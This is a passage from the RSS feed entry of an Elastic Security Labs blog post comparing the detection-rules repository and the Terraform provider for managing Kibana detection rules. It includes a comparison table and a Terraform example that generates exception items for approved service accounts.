<li><strong>Best fit user profile</strong>: Detection engineers</li>
<li><strong>Intended workflow phase</strong>: Rule authoring and validation</li>
</ul>
<p>With dual-sync between your GitHub repo and Kibana, linting, schema validation, and unit-testing, detection-rules functionality is well-suited to experienced Detection Engineers comfortable with Git-based version control.</p>
<h3>Elastic Stack Terraform Provider</h3>
<ul>
<li><strong>Best fit user profile</strong>: DevOps engineers / Platform teams</li>
<li><strong>Intended workflow phase</strong>: Deployment and operations</li>
</ul>
<p>For users already using Terraform to manage their Elastic clusters, the Terraform Provider is a great fit, bringing consistency to all &quot;x-as-code&quot; operations and familiar state management and parameterization.</p>
<p>The key differences and optimal use cases for each tool are detailed in the comparison table below:</p>
<table>
<thead>
<tr>
<th align="left">Workflow Stage</th>
<th align="left">detection-rules</th>
<th align="left">Terraform Provider</th>
<th align="left">Best Fit</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Rule Authoring</strong></td>
<td align="left">Purpose-built tooling: create-rule wizard, TOML schema, KQL/EQL validation, field checks against ECS, Kibana-to-code export.</td>
<td align="left">Standard HCL definitions; teams integrate their preferred validation tooling into existing pipelines.</td>
<td align="left"><strong>detection-rules:</strong> Detection engineers authoring and refining rules daily. Teams wanting to automatically convert rules from Kibana into code. <strong>Terraform:</strong> Teams already using Terraform in their workflows, or teams wanting to automate and deploy detection rules as code, but without an established CI/CD platform.</td>
</tr>
<tr>
<td align="left"><strong>Testing &amp; Validation</strong></td>
<td align="left">Built-in unit testing framework, schema validation, query validation, configurable test suites.</td>
<td align="left">Terraform tests for optional unit testing. No built-in query validation: the provider relies on the Kibana API to accept or reject rule definitions at apply time.</td>
<td align="left"><strong>detection-rules:</strong> Teams wanting out-of-the-box detection testing. <strong>Terraform:</strong> Platform teams managing rules as part of broader IaC with existing validation pipelines. Teams happy to write custom tests in Terraform.</td>
</tr>
<tr>
<td align="left"><strong>Exception Management</strong></td>
<td align="left">Native exception list handling; export/import with rules, TOML storage, and rule linking.</td>
<td align="left">Exception lists can be referenced via rule attributes.</td>
<td align="left"><strong>detection-rules:</strong> Teams managing exceptions as part of detection content. <strong>Terraform:</strong> Teams managing exceptions as separate infrastructure resources.</td>
</tr>
<tr>
<td align="left"><strong>Governance &amp; Drift Management</strong></td>
<td align="left">VCS-based with dual sync: push rules from repo to Kibana and export from Kibana back to repo, allowing either to serve as the source of truth. Drift detection is achievable with custom export-and-diff tooling.</td>
<td align="left">VCS-authoritative: state file enforces declared configuration.  Native drift detection: Terraform plan surfaces any out-of-band changes made in Kibana.</td>
<td align="left"><strong>detection-rules:</strong> Teams comfortable with Git-based workflows and flexible sync models. <strong>Terraform:</strong> Organisations requiring formal state reconciliation and audit trails.</td>
</tr>
<tr>
<td align="left"><strong>Rollback</strong></td>
<td align="left">Git history provides version control; re-import previous versions from the repo.</td>
<td align="left">Revert HCL configuration in Git and re-apply to restore the previous state.</td>
<td align="left"><strong>detection-rules:</strong> Teams using Git-centric recovery workflows. <strong>Terraform:</strong> Organisations with standardised rollback mechanisms across infrastructure and rulesets.</td>
</tr>
<tr>
<td align="left"><strong>Parameterisation &amp; Templating</strong></td>
<td align="left">Achievable with external preprocessing (Jinja2, etc.) before import.</td>
<td align="left">Native HCL features: variables, locals, for_each, dynamic blocks, and modules.</td>
<td align="left"><strong>detection-rules:</strong> Teams not requiring parameterisation or with existing templating solutions.  <strong>Terraform:</strong> Teams wanting native IaC parameterisation.</td>
</tr>
<tr>
<td align="left"><strong>Operational Integration</strong></td>
<td align="left">Focused tooling optimised for detection engineering workflows.</td>
<td align="left">Unified control plane managing detection rules alongside cloud infrastructure, network policies, and other security tooling.  Integrates with other resources that may be required by detections such as external connectors.</td>
<td align="left"><strong>detection-rules:</strong> Specialist detection teams. More flexible if dual-sync (Kibana and repo are both sources of truth).  <strong>Terraform:</strong> Platform teams managing Elastic as part of broader infrastructure.</td>
</tr>
</tbody>
</table>
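<p>The native parameterisation noted in the table above is worth a concrete sketch. Using the exception item resource from earlier, <code>for_each</code> can stamp out one exception per approved account from a single definition (the map contents here are hypothetical):</p>
<pre><code># Hypothetical map of approved service accounts and their justifications.
variable &quot;approved_interactive_accounts&quot; {
  type = map(string)
  default = {
    svc_sqlbackup = &quot;Legacy SQL backup agent requires interactive logon.&quot;
    svc_printmgmt = &quot;Print management console runs under a service account.&quot;
  }
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;approved&quot; {
  for_each       = var.approved_interactive_accounts
  list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
  item_id        = &quot;${each.key}-exception&quot;
  name           = &quot;${each.key} - approved interactive logon&quot;
  description    = each.value
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = each.key
    }
  ]
}
</code></pre>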
<p>In short, Detection Engineers are better served by the specialized creation and testing tools provided in the <code>detection-rules</code> repository, while DevOps/Platform Teams should use the Terraform provider to manage detection rules as part of their broader infrastructure-as-code strategy for deployment and operations.</p>
<h2>Try it out</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, upgrade to 9.3 or start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more and get started.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/managing-rules-with-terraform.png" length="0" type="image/png"/>
        </item>
    </channel>
</rss>